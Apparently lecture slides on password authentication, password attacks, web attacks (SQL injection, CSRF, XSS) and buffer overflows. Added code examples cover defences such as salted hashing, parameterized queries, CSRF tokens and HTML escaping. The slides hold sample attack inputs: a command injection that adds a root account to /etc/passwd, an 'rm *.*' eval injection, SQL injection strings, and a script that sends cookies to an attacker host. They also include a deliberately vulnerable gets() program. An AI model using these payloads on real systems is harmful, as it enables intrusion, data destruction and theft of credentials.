1. PASSWORD ATTACK · The host does not need to know the passwords. The host just has to be able to...
1. PASSWORD ATTACK
2. APPLICATION ATTACK
References:
1. Bruce Schneier, Applied Cryptography
2. CEH v7 Tutorial
21/03/2017
2
Authentication
Authentication using One-Way Functions
Authentication using Public-Key Cryptography
Attack
Authentication
When Alice logs into a host computer, how does the host know who she is?
How does the host know she is not Eve trying to falsify Alice’s identity?
Traditionally, passwords solve this problem.
Both Alice and the host know this secret piece of knowledge, and the host requests it from Alice every time she tries to log in.
Authentication using One-Way Functions
The host does not need to know the passwords.
The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way functions.
Instead of storing passwords, the host stores one-way functions of the passwords.
1. Alice sends the host her password.
2. The host performs a one-way function on the password.
3. The host compares the result of the one-way function to the value it previously stored.
Since the host no longer stores a table of everybody's valid password, the threat of someone breaking into the host and stealing the password list is mitigated.
The list of passwords operated on by the one-way function is useless, because the one-way function cannot be reversed to recover the passwords.
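The three-step check above, as an added Python example (not from the slides or from Schneier): the host stores only the output of a one-way function and compares digests at login. The per-user salt and the PBKDF2 work factor go beyond the slide's plain one-way function; they are the hardening that keeps a stolen hash list from being reversed by the dictionary and brute-force techniques covered later in this deck.

```python
import hashlib
import hmac
import secrets

# Work factor for PBKDF2-HMAC-SHA256. This is an added hardening: the slide
# describes a plain one-way function, which a fast hash like MD5 also is, but a
# fast hash lets an attacker test billions of dictionary guesses per second.
ITERATIONS = 600_000


def enroll(password: str, iterations: int = ITERATIONS) -> dict:
    """Host-side enrolment: store f(password), never the password itself.

    A random per-user salt means two users with the same password get
    different stored values, so a stolen table cannot be attacked with one
    precomputed dictionary of hashes.
    """
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return {"salt": salt, "iterations": iterations, "digest": digest}


def login(record: dict, candidate: str) -> bool:
    """Steps 1 to 3 of the slide: receive the password, apply the one-way
    function with the stored salt and work factor, compare with the stored value."""
    recomputed = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode("utf-8"), record["salt"], record["iterations"]
    )
    # Constant-time comparison: a plain == returns early on the first differing
    # byte and leaks how much of the digest matched through timing.
    return hmac.compare_digest(recomputed, record["digest"])


if __name__ == "__main__":
    # Constructed sample credentials for Alice; the host keeps only the record.
    alice = enroll("correct horse battery staple")
    print("Alice, right password:", login(alice, "correct horse battery staple"))
    print("Eve, wrong password:  ", login(alice, "Tr0ub4dor&3"))
```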
Authentication using Public-Key Cryptography
PROBLEM:
When Alice sends her password to her host, anyone who has access to her data path can read it.
Eve can be at any one of those points, listening to Alice's login sequence. If Eve has access to the processor memory of the host, she can see the password before the host hashes it.
Public-key cryptography can solve this problem.
The host keeps a file of every user's public key.
All users keep their own private keys.
When logging in, the protocol proceeds as follows:
• The host sends Alice a random string.
• Alice encrypts the string with her private key and sends it back to the host, along with her name.
• The host looks up Alice's public key in its database and decrypts the message using that public key.
• If the decrypted string matches what the host sent Alice in the first place, the host allows Alice access to the system.
Secure proof-of-identity protocols take the following form:
• Alice performs a computation based on some random numbers and her private key and sends the result to the host.
• The host sends Alice a different random number.
• Alice makes some computation based on the random numbers (both the ones she generated and the one she received from the host) and her private key, and sends the result to the host.
• The host does some computation on the various numbers received from Alice and her public key to verify that she knows her private key.
• If she does, her identity is verified.
If Alice does not trust the host any more than the host trusts Alice, then Alice will require the host to prove its identity in the same manner.
Step (1) might seem unnecessary and confusing, but it is required to prevent attacks against the protocol.
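The five-step proof of identity above, as an added Python example that is not from the slides or from Schneier: Schnorr's identification protocol, which follows those steps with both sides written out. Two assumptions: the group parameters are deliberately tiny so the arithmetic is readable (a real deployment uses a standardized large prime-order group), and in Schnorr the step (1) message depends only on Alice's fresh random number, which is exactly why it must be sent before the host's challenge.

```python
import secrets

# Toy group parameters, constructed for readability and far too small for real use:
# p is a safe prime, q = (p - 1) / 2 is prime, and g generates the subgroup of order q.
P = 2039
Q = 1019
G = 4
assert pow(G, Q, P) == 1 and G != 1  # sanity check: g really has order q


def keygen():
    """Alice's long-term key pair: private x, public y = g^x mod p (the host stores y)."""
    x = secrets.randbelow(Q - 1) + 1
    return x, pow(G, x, P)


class Prover:
    """Alice: knows the private key and must prove it without revealing it."""

    def __init__(self, private_key):
        self.x = private_key
        self.r = None

    def step1_commit(self):
        # Step (1): a computation on a fresh random r, sent before any challenge.
        # Fixing r first is what keeps the response in step (3) from leaking x.
        self.r = secrets.randbelow(Q - 1) + 1
        return pow(G, self.r, P)

    def step3_respond(self, challenge):
        # Step (3): combine own random r, the host's challenge c and private x.
        return (self.r + challenge * self.x) % Q


class Verifier:
    """The host: holds only Alice's public key y."""

    def __init__(self, public_key):
        self.y = public_key
        self.t = None
        self.c = None

    def step2_challenge(self, commitment):
        # Step (2): a different random number, chosen only after the commitment arrived.
        self.t = commitment
        self.c = secrets.randbelow(Q - 1) + 1
        return self.c

    def step4_verify(self, response):
        # Step (4): g^s must equal t * y^c. That holds iff s = r + c*x (mod q),
        # which Alice can only produce if she knows x.
        lhs = pow(G, response, P)
        rhs = (self.t * pow(self.y, self.c, P)) % P
        return lhs == rhs


def run_login(private_key, public_key):
    """One complete exchange; True when the host accepts the identity (step 5)."""
    alice, host = Prover(private_key), Verifier(public_key)
    t = alice.step1_commit()         # Alice -> host
    c = host.step2_challenge(t)      # host  -> Alice
    s = alice.step3_respond(c)       # Alice -> host
    return host.step4_verify(s)


if __name__ == "__main__":
    x, y = keygen()
    print("Alice with her private key:", run_login(x, y))
    eve_x = (x + 1) % Q or 1         # Eve guessing some other private key
    print("Eve without the private key:", run_login(eve_x, y))
```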
Password Cracking Techniques
(a) Dictionary attack: based on familiar passwords
(b) Brute force attack: tries every combination of characters
(c) Hybrid attack: like a dictionary attack, but adds some numbers and symbols
(d) Syllable attack: combination of brute force attack and dictionary attack
(e) Rule-based attack: used when the attacker has some information about the password
A keylogger is a program that runs in the background and allows remote attackers to record every keystroke.
A Trojan enables attackers to get access to the passwords stored on the attacked computer.
Spyware is a type of malware that allows attackers to secretly gather information about a person or organization.
What does spyware do?
Steals the user's personal information and sends it to a remote server
Monitors the user's online activity
Displays annoying pop-ups and redirects the browser to advertising sites
Decreases the overall system security level
Connects to remote pornography sites
Reduces system performance and causes software instability
Purpose of a Trojan:
Steal information such as passwords, security codes and credit card information, using a keylogger
Delete or replace critical OS system files
Generate fake traffic to create a DoS attack
Disable firewall and antivirus
Use the victim's PC for spamming
Use the victim's PC as part of a botnet
A default password is a password supplied by the manufacturer with new equipment that is password protected.
Ex: www.defaultpassword.com
Windows stores user passwords in the Security Account Manager (SAM), not in clear text but hashed.
References:
1. Network Security. John Mitchell. Stanford University
2. CEH v7 Tutorial
Web security threat model
Web Attacker: sets up a malicious site visited by the victim; no control of the network.
(Diagram: the Web Attacker's site, Alice, and the System she uses.)
Network security threat model
Network Attacker: intercepts and controls network communication.
(Diagram: the Network Attacker sits on the path between Alice and the System.)
SQL Injection
Browser sends malicious input to server
Bad input checking leads to malicious SQL query (uses SQL to change the meaning of a database command)
CSRF – Cross-site request forgery
Bad web site sends request to good web site, using credentials of an innocent victim who "visits" the site (leverages the user's session at the victim server)
XSS – Cross-site scripting
Bad web site sends innocent victim a script that steals information from an honest web site (injects malicious script into a trusted context)
Background for SQL Injection
Attack goal: execute arbitrary code on the server
Example: code injection based on eval (PHP)
http://site.com/calc.php (server-side calculator)
Attack: http://site.com/calc.php?exp=" 10 ; system('rm *.*') " (URL encoded)
…
$in = $_GET['exp'];
eval('$ans = ' . $in . ';');
…
Example: PHP server-side code for sending email
$email = $_POST["email"];
$subject = $_POST["subject"];
system("mail $email -s $subject < /tmp/joinmynetwork");
Attacker can post:
http://yourdomain.com/mail.php?subject=foo < /usr/passwd; ls
OR
http://yourdomain.com/mail.php?[email protected]&subject=foo; echo "evil::0:0:root:/:/bin/sh">>/etc/passwd; ls
Sample PHP (the wrong way)
$recipient = $_POST['recipient'];
$sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
$rs = $db->executeQuery($sql);
Problem: What if 'recipient' is a malicious string that changes the meaning of the query?
(Diagram: the Attacker sends input to the Victim Server (1), which issues an unintended SQL query to the Victim SQL DB (2), and the attacker receives valuable data (3).)
CardSystems
Credit card payment processing company
SQL injection attack in June 2005
Put out of business
The Attack
263,000 credit card #s stolen from database
Credit card #s stored unencrypted
43 million credit card #s exposed
WordPress SEO plugin by Yoast, March 2015
“The latest version at the time of writing (1.7.3.3) has been found to be affected by two authenticated (admin, editor or author user) Blind SQL Injection vulnerabilities.
“The authenticated Blind SQL Injection vulnerability can be found within the ‘admin/class-bulk-editor-list-table.php’ file. The orderby and order GET parameters are not sufficiently sanitized before being used within a SQL query.
https://wpvulndb.com/vulnerabilities/7841
set ok = execute( "SELECT * FROM Users
WHERE user=' " & form("user") & " '
AND pwd=' " & form("pwd") & " '" );
if not ok.EOF
login success
else fail;
Is this exploitable?
Normal Query
(Diagram: the user enters username and password in the Web Browser (Client); the Web Server sends the DB:)
SELECT * FROM Users WHERE user='me' AND pwd='1234'
Suppose user = " ' or 1=1 -- " (URL encoded)
Then script does: ok = execute( SELECT … WHERE user= ' ' or 1=1 -- … )
The "--" causes the rest of the line to be ignored.
Now ok.EOF is always false and login succeeds.
The bad news: easy login to many sites this way.
Suppose user = " ' ; DROP TABLE Users -- "
Then script does: ok = execute( SELECT … WHERE user= ' ' ; DROP TABLE Users … )
Deletes user table
Similarly: attacker can add users, reset pwds, etc.
Suppose user = " ' ; exec cmdshell 'net user badguy badpwd' /ADD -- "
Then script does: ok = execute( SELECT … WHERE username= ' ' ; exec … )
If the SQL server context runs as "sa", attacker gets an account on the DB server
PHP: addslashes(" ' or 1=1 -- ")
outputs: " \' or 1=1 -- "
Unicode attack (GBK):
$user = 0x bf 27
addslashes($user) = 0x bf 5c 27
Byte values: 0x 5c = \ ; 0x bf 27 = ¿' ; 0x bf 5c = one GBK character, so the 0x27 quote that follows is left unescaped
Correct implementation: mysql_real_escape_string()
Never build SQL commands yourself !
Use parameterized/prepared SQL
Use ORM framework
Example: Parameterized SQL (ASP.NET 1.1)
Builds SQL queries by properly escaping args: ' becomes \'
Ensures SQL arguments are properly escaped.
SqlCommand cmd = new SqlCommand(
"SELECT * FROM UserTable WHERE
username = @User AND
password = @Pwd", dbConnection);
cmd.Parameters.Add("@User", Request["user"] );
cmd.Parameters.Add("@Pwd", Request["pwd"] );
cmd.ExecuteReader();
In PHP: bound parameters -- similar function
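The login query from slides 41 to 48 in an added Python example (not from the slides), using an in-memory SQLite database as a stand-in for the slides' SQL Server and MySQL: the string-built query accepts the `' or 1=1 --` input from slide 43, the parameterized version treats it as a value, and a byte-level re-implementation of PHP's addslashes shows the GBK problem from slide 46. The user table and its passwords are constructed here.

```python
import sqlite3

# Constructed user table; passwords are in clear text only to mirror the slides'
# query (slide 7: a real host stores a one-way function of the password instead).
USERS = [("me", "1234"), ("alice", "s3cret")]


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", USERS)
    return conn


def login_concatenated(conn, user, pwd):
    """Slide 41 as written: the query text is built from form fields, so the
    user controls SQL syntax, not just a value."""
    sql = "SELECT * FROM Users WHERE user='" + user + "' AND pwd='" + pwd + "'"
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, user, pwd):
    """Slide 48: placeholders keep the SQL fixed; the driver passes user and pwd
    as values, so quotes and -- inside them never change the statement."""
    sql = "SELECT * FROM Users WHERE user=? AND pwd=?"
    return conn.execute(sql, (user, pwd)).fetchone() is not None


def addslashes(data: bytes) -> bytes:
    """Byte-oriented re-implementation of PHP's addslashes: a backslash before
    single quote, double quote, backslash and NUL, with no knowledge of the
    connection's character set (that is the defect slide 46 points at)."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\0":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def unescaped_quotes_after_gbk(data: bytes) -> int:
    """Escape at the byte level, then read the result the way a GBK connection
    would. A quote counts as unescaped when, once multibyte characters are
    resolved, the character before it is not a backslash."""
    escaped = addslashes(data).decode("gbk")
    return sum(1 for i, ch in enumerate(escaped)
               if ch == "'" and (i == 0 or escaped[i - 1] != "\\"))


if __name__ == "__main__":
    conn = new_db()
    attack_user = "' or 1=1 --"           # slide 43, before URL encoding
    print("concatenated, normal login:", login_concatenated(conn, "me", "1234"))
    print("concatenated, injected:    ", login_concatenated(conn, attack_user, "x"))
    print("parameterized, injected:   ", login_parameterized(conn, attack_user, "x"))
    # 0xbf 0x27 is the slide's two-byte input; after addslashes the 0xbf 0x5c pair
    # forms one GBK character and the quote behind it stands alone again.
    print("GBK quotes left unescaped:  ", unescaped_quotes_after_gbk(b"\xbf'"))
    print("ASCII quotes left unescaped:", unescaped_quotes_after_gbk(b"' or 1=1 --"))
```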
(Diagram: Attack Server, Server Victim, User Victim; steps 1, 2, 4.)
Q: how long do you stay logged in to Gmail? Facebook? ….
Example:
User logs in to bank.com
Session cookie remains in browser state
User visits another site containing:
<form name=F action=http://bank.com/BillPay.php>
<input name=recipient value=badguy> …
<script> document.F.submit(); </script>
Browser sends user auth cookie with request
Transaction will be fulfilled
Problem:
cookie auth is insufficient when side effects occur
(Diagram: the user's credentials travel with every request as Cookie: SessionID=523FA4cd2E.)
(Diagram: Bad web site, Home router, User; steps 1 to 4.)
Fact:
50% of home users have a broadband router with a default or no password
Drive-by Pharming attack: User visits a malicious site. JavaScript at the site scans the home network looking for the broadband router:
• SOP allows "send only" messages
• Detect success using onerror:
<IMG SRC=192.168.0.1 onError = do() >
Once found, log in to the router and change the DNS server
Problem: "send-only" access is sufficient to reprogram the router
[SRJ'07]
(Diagram: requests carry referer: http://www.site.com)
What if honest site sends POST to attacker.com?
Solution: origin header records redirect
Login CSRF: Strict Referer/Origin header validation. Login forms typically submit over HTTPS, not blocked
HTTPS sites, such as banking sites: Use strict Referer/Origin validation to prevent CSRF
Other: Use Ruby-on-Rails or other framework that implements the secret token method correctly
Origin header: Alternative to Referer with fewer privacy problems. Sent only on POST, sends only necessary data. Defense against redirect-based attacks
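The two defences in the table above, strict Referer/Origin validation and the secret token method, as an added Python example (not from the slides): the check a server would run before acting on a state-changing POST such as the BillPay.php request from slide 52. The site origin, session id, header and form dictionaries are constructed here; the token is derived with HMAC from a server-side key, one common way to implement the secret token method.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://bank.com"       # constructed; the site from slide 52
SERVER_KEY = secrets.token_bytes(32)   # server-side secret no other site can read


def origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def origin_allowed(headers: dict, site_origin: str = SITE_ORIGIN) -> bool:
    """Strict Referer/Origin validation (slide 63). Origin is checked first: it
    is sent on POST and carries no path, which is the privacy point in the
    table. Strict means a request with neither header is rejected rather than
    waved through, since the attacker's page cannot set either header."""
    if "Origin" in headers:
        return headers["Origin"] == site_origin
    if "Referer" in headers:
        return origin_of(headers["Referer"]) == site_origin
    return False


def csrf_token(session_id: str) -> str:
    """Secret token method: a per-session value embedded in the site's own forms.
    The auto-submitting form on the attacker's site (slide 52) cannot include it,
    because the attacker cannot read bank.com's pages or cookies."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def token_valid(session_id: str, form: dict) -> bool:
    presented = form.get("csrf_token", "")
    if not isinstance(presented, str) or not presented.isascii():
        return False
    return hmac.compare_digest(presented, csrf_token(session_id))


def accept_state_change(headers: dict, form: dict, session_id: str) -> bool:
    """Both checks must pass before BillPay.php acts: the session cookie alone
    is insufficient once side effects occur (slide 52)."""
    return origin_allowed(headers) and token_valid(session_id, form)


if __name__ == "__main__":
    sid = "523FA4cd2E"   # the SessionID value shown on slide 53
    good_form = {"recipient": "alice", "csrf_token": csrf_token(sid)}
    # Constructed requests: the user's own form, and slide 52's attack page
    # auto-submitting a form while the browser attaches the user's cookie.
    own_site = {"Origin": SITE_ORIGIN, "Cookie": f"SessionID={sid}"}
    attacker = {"Origin": "https://attacker.example", "Cookie": f"SessionID={sid}"}
    print("own form:      ", accept_state_change(own_site, good_form, sid))
    print("attacker form: ", accept_state_change(attacker, {"recipient": "badguy"}, sid))
    print("no origin info:", accept_state_change({"Cookie": f"SessionID={sid}"}, good_form, sid))
```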
(Diagram: Attack Server, Victim Server, Victim client; steps 1, 2, 5.)
Search field on victim.com:
http://victim.com/search.php?term=apple
Server-side implementation of search.php (echoes the search term into the response):
<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET['term'] ?> :
. . .
</BODY> </HTML>
Consider link: (properly URL encoded)
http://victim.com/search.php ? term =
<script> window.open(
“http://badguy.com?cookie = ” +
document.cookie ) </script>
What if user clicks on this link?
1. Browser goes to victim.com/search.php
2. Victim.com returns
<HTML> Results for <script> … </script>
3. Browser executes script:
Sends badguy.com cookie for victim.com
Page 68
[Figure: reflected XSS flow between the Victim client, www.victim.com (Victim Server) and www.attacker.com (Attack Server). The client requests http://victim.com/search.php?term=<script> ... </script>; the victim server returns the page below, and the script in it sends document.cookie to the attack server.]
<html>
Results for
<script>
window.open("http://attacker.com?" ... document.cookie ...)
</script>
</html>
Page 69
An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application.
Methods for injecting malicious code:
Reflected XSS ("type 1"): the attack script is reflected back to the user as part of a page from the victim site
Stored XSS ("type 2"): the attacker stores the malicious code in a resource managed by the web application, such as a database
Others, such as DOM-based attacks
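The root cause in the search.php slide and in the reflected XSS walk-through is that the term is echoed into HTML unchanged. The fix is output encoding, shown here as an added example in C (not code from the slides or from PHP): an escaper for the five HTML-significant characters, and a renderer that builds the "Results for ..." line only from the escaped term. The function names and the buffer sizes are the example's own choices.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Entity for each HTML-significant character; NULL means copy the byte as-is. */
static const char *entity_for(char c) {
    switch (c) {
    case '&':  return "&amp;";
    case '<':  return "&lt;";
    case '>':  return "&gt;";
    case '"':  return "&quot;";
    case '\'': return "&#39;";
    default:   return NULL;
    }
}

/* Escape `in` into `out` (capacity `cap`, including the terminating NUL).
   Returns true on success. If the escaped text would not fit, `out` is left
   as an empty string and false is returned, so a caller can never emit a
   half-escaped value by mistake. */
bool html_escape(const char *in, char *out, size_t cap) {
    size_t used = 0;
    if (cap == 0) return false;
    for (; *in != '\0'; in++) {
        const char *rep = entity_for(*in);
        size_t len = rep ? strlen(rep) : 1;
        if (used + len >= cap) {      /* leave room for the NUL */
            out[0] = '\0';
            return false;
        }
        if (rep) memcpy(out + used, rep, len);
        else     out[used] = *in;
        used += len;
    }
    out[used] = '\0';
    return true;
}

/* Counterpart of the slide's search.php: the term reaches the page only
   through html_escape(), so "<script>" arrives in the browser as text. */
bool render_results(const char *term, char *page, size_t cap) {
    char safe[256];                   /* constructed limit for this example */
    if (!html_escape(term, safe, sizeof safe)) return false;
    int n = snprintf(page, cap,
                     "<html><body>Results for %s :</body></html>", safe);
    return n >= 0 && (size_t)n < cap;
}
```

Escaping is context-specific: this encoder is correct for text between tags and inside quoted attribute values, which is the case in the slide; a term placed inside a script block, a URL or a CSS value needs the encoder for that context instead.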
Page 70
[Figure: email version of the attack diagram, with Attack Server, Server Victim and User Victim and steps numbered 1, 2 and 5]
Page 71
Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website.
Injected code redirected PayPal visitors to a page warning users their accounts had been compromised.
Victims were then redirected to a phishing site and prompted to enter sensitive financial data.
Source: http://www.acunetix.com/news/paypal.htm
Page 72
SQL Injection: bad input checking allows a malicious SQL query; known defenses address the problem effectively
CSRF (cross-site request forgery): forged request leveraging an ongoing session; can be prevented (if XSS problems are fixed)
XSS (cross-site scripting): problem stems from echoing untrusted input; difficult to prevent, requires care, testing, tools, …
Other server vulnerabilities: increasing knowledge embedded in frameworks, tools and application development recommendations
Page 73
Ref
1. Professor Hossein Saiedian, KU Electrical Engineering and Computer Science.
Page 74
“A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.”
Page 75
A very common attack mechanism
from 1988 Morris Worm to Code Red, Slammer, Sasser and many others
Prevention techniques known
Still of major concern due to
legacy of widely deployed buggy
continued careless programming techniques
Page 76
Caused by programming error
Allows more data to be stored than capacity available in a fixed sized buffer
buffer can be on stack, heap, global data
Overwriting adjacent memory locations
corruption of program data
unexpected transfer of control
memory access violation
execution of code chosen by attacker
Page 77
#include <stdio.h>
#include <string.h>

#define FALSE 0
#define TRUE  1

/* The slide does not define next_tag(); it is assumed here to copy the
   expected tag "START" into str1, which matches the first run below. */
void next_tag(char *str1) {
    strcpy(str1, "START");
}

int main(int argc, char *argv[]) {
    int valid = FALSE;
    char str1[8];
    char str2[8];
    next_tag(str1);
    gets(str2);          /* unbounded read: a long line overflows str2 into str1 */
    if (strncmp(str1, str2, 8) == 0)
        valid = TRUE;
    printf("buffer1: str1(%s), str2(%s), valid(%d)\n", str1, str2, valid);
    return 0;
}
$ cc -g -o buffer1 buffer1.c
$ ./buffer1
START
buffer1: str1(START), str2(START), valid(1)
$ ./buffer1
EVILINPUTVALUE
buffer1: str1(TVALUE), str2(EVILINPUTVALUE), valid(0)
$ ./buffer1
BADINPUTBADINPUT
buffer1: str1(BADINPUT), str2(BADINPUTBADINPUT), valid(1)
Page 78
Stack contents around str1 and str2 for the third run (input BADINPUTBADINPUT); each cell shows the word in hex followed by its ASCII rendering:

| Memory Address | Before gets(str2) | After gets(str2) | Contains Value of |
|---|---|---|---|
| . . . . | . . . . | . . . . | |
| bffffbf4 | 34fcffbf (4 . . .) | 34fcffbf (3 . . .) | argv |
| bffffbf0 | 01000000 (. . . .) | 01000000 (. . . .) | argc |
| bffffbec | c6bd0340 (. . . @) | c6bd0340 (. . . @) | return addr |
| bffffbe8 | 08fcffbf (. . . .) | 08fcffbf (. . . .) | old base ptr |
| bffffbe4 | 00000000 (. . . .) | 01000000 (. . . .) | valid |
| bffffbe0 | 80640140 (. d . @) | 00640140 (. d . @) | |
| bffffbdc | 54001540 (T . . @) | 4e505554 (N P U T) | str1[4-7] |
| bffffbd8 | 53544152 (S T A R) | 42414449 (B A D I) | str1[0-3] |
| bffffbd4 | 00850408 (. . . .) | 4e505554 (N P U T) | str2[4-7] |
| bffffbd0 | 30561540 (0 V . @) | 42414449 (B A D I) | str2[0-3] |
| . . . . | . . . . | . . . . | |
Page 79
Page 80
To exploit a buffer overflow an attacker
must identify a buffer overflow vulnerability in some program
inspection, tracing execution, fuzzing tools
understand how buffer is stored in memory and determine potential for corruption
Page 81
At machine level all data is an array of bytes; the interpretation depends on the instructions used
Modern high-level languages have a strong notion of type and valid operations: not vulnerable to buffer overflows
does incur overhead, some limits on use
C and related languages have high-level control structures but allow direct access to memory, hence are vulnerable to buffer overflow
have a large legacy of widely used, unsafe, and hence vulnerable code
Page 82
Stack frame:
Calling function: needs a data structure to store the "return" address and the parameters to be passed
Called function: needs a place to store its local variables, somewhere different for every call
Page 83
Occurs when buffer is located on stack
used by Morris Worm
“Smashing the Stack” paper popularized it
Have local variables below saved frame pointer and return address
hence overflow of a local buffer can potentially overwrite these key control items
Attacker overwrites return address with address of desired code
program, system library or loaded in buffer
Page 84
Page 85
Buffer overflows are widely exploited
Large amount of vulnerable code in use
despite cause and countermeasures known
Two broad defense approaches
compile-time - harden new programs
run-time - handle attacks on existing programs
Page 86
Use a modern high-level language with strong typing
not vulnerable to buffer overflow
compiler enforces range checks and permissible operations on variables
Do have cost in resource use
And restrictions on access to hardware
so still need some code in C-like languages
Page 87
If using potentially unsafe languages eg C
Programmer must explicitly write safe code
by design with new code
extensive after code review of existing code, (e.g., OpenBSD)
Buffer overflow safety a subset of general safe coding techniques
Allow for graceful failure (know how things may go wrong)
check for sufficient space in any buffer
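"Check for sufficient space in any buffer" applied to the buffer1 program from the earlier slide, as an added example that is not code from the slides: the unbounded gets() is replaced by a bounded line copy that refuses input which would not fit, so str2 can no longer run into str1 and the third run's false valid(1) cannot happen. next_tag() is assumed, as before, to supply "START"; check_tag() takes the input line as a string so the behaviour can be exercised without a terminal.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define TAG_LEN 8   /* same buffer size as the slide's str1 and str2 */

/* Stand-in for the slide's next_tag(): assumed to supply the expected tag.
   snprintf() is bounded by the destination capacity, unlike strcpy(). */
static void next_tag(char *dst, size_t cap) {
    snprintf(dst, cap, "%s", "START");
}

/* Bounded copy of one input line (up to a newline) into dst.
   Returns false, leaving dst untouched, if the line plus its NUL would not
   fit: this is exactly the case gets() silently turns into an overflow. */
static bool read_line_bounded(char *dst, size_t cap, const char *src) {
    size_t n = strcspn(src, "\n");   /* length of the line without the newline */
    if (n >= cap) return false;      /* n bytes plus NUL must fit in cap */
    memcpy(dst, src, n);
    dst[n] = '\0';
    return true;
}

/* Returns 1 if the input matches the tag, 0 if it does not, and -1 if the
   input was rejected as too long (graceful failure instead of corruption). */
int check_tag(const char *input) {
    char str1[TAG_LEN];
    char str2[TAG_LEN];
    next_tag(str1, sizeof str1);
    if (!read_line_bounded(str2, sizeof str2, input)) return -1;
    return strncmp(str1, str2, TAG_LEN) == 0 ? 1 : 0;
}
```

Note that an 8-byte buffer holds at most 7 characters plus the terminator, so "BADINPUT" on its own is already rejected; the slide's third input is caught for the same reason rather than being truncated into a false match.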
Page 88
Proposals for safety extensions (library replacements) to C
performance penalties
must compile programs with special compiler
Several safer standard library variants
new functions, e.g. strlcpy()
safer re-implementation of standard functions as a dynamic library, e.g. Libsafe
Page 89
StackGuard: add function entry and exit code to check the stack for signs of corruption; use a random canary
e.g. StackGuard, Win/GS, GCC
check for overwrite between local variables and the saved frame pointer and return address
abort program if a change is found
issues: recompilation, debugger support
Or save/check a safe copy of the return address (in a safe, non-corruptible memory area), e.g. StackShield, RAD
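The canary check described above, simulated as an added example in C (not StackGuard's own code or the slides'): a struct lays out a local buffer directly below a canary word and a saved return address, the prologue plants the canary, an unchecked copy writes into the frame, and the epilogue check reports whether the canary survived. The canary value and the return-address placeholder are constructed constants; a real implementation draws the canary at process start.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simulated stack frame in the slide's order: the local buffer sits just
   below the canary, which sits just below the saved frame pointer/return
   address. An overflow of buf has to cross the canary to reach saved_ret. */
struct frame {
    char     buf[8];
    uint64_t canary;
    uint64_t saved_ret;   /* stands in for the real return address */
};

/* Constructed canary value for the example; StackGuard and GCC's
   -fstack-protector use a random value chosen when the process starts. */
static const uint64_t CANARY = 0x5ca1ab1e0ddba11ULL;

/* Behaves like an unchecked copy into the frame's buffer (the gets() of the
   buffer1 slide), capped at the frame size so the simulation itself stays
   within the object it writes to. */
void unchecked_copy(struct frame *f, const void *input, size_t len) {
    if (len > sizeof *f) len = sizeof *f;
    memcpy((unsigned char *)f, input, len);
}

/* The function-exit check: is the canary still the value planted on entry? */
bool canary_intact(const struct frame *f) {
    return f->canary == CANARY;
}

/* Run prologue, copy and epilogue check for one input.
   Returns true if the frame would be allowed to return, false if the
   runtime would abort the program instead. */
bool simulate(const char *input, size_t len) {
    struct frame f;
    memset(&f, 0, sizeof f);
    f.canary = CANARY;               /* prologue: plant the canary */
    f.saved_ret = 0x08048c6bULL;     /* constructed placeholder, not a real address */
    unchecked_copy(&f, input, len);
    return canary_intact(&f);        /* epilogue: verify before returning */
}
```

The check catches contiguous overwrites that pass through the canary; it does not detect a write that skips over it, which is why the slide lists saving a separate copy of the return address (StackShield, RAD) as a complementary approach.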
Page 90
Many buffer overflow attacks copy machine code into the buffer and transfer control to it
Use virtual memory support to make some regions of memory non-executable (to avoid executing the attacker's code), e.g. stack, heap, global data
need h/w support in MMU
long existed on SPARC/Solaris systems
recent on x86 Linux/Unix/Windows systems
Issues: support for executable stack code
Page 91
Manipulate location of key data structures
stack, heap, global data: change address by 1 MB
using random shift for each process
have large address range on modern systems means wasting some has negligible impact
Randomize location of heap buffers and location of standard library functions
Page 92
Place guard pages between critical regions of memory (or between stack frames)
flagged in MMU (mem mgmt unit) as illegal addresses
any access aborts process
Can even place between stack frames and heap buffers
at execution time and space cost
Page 93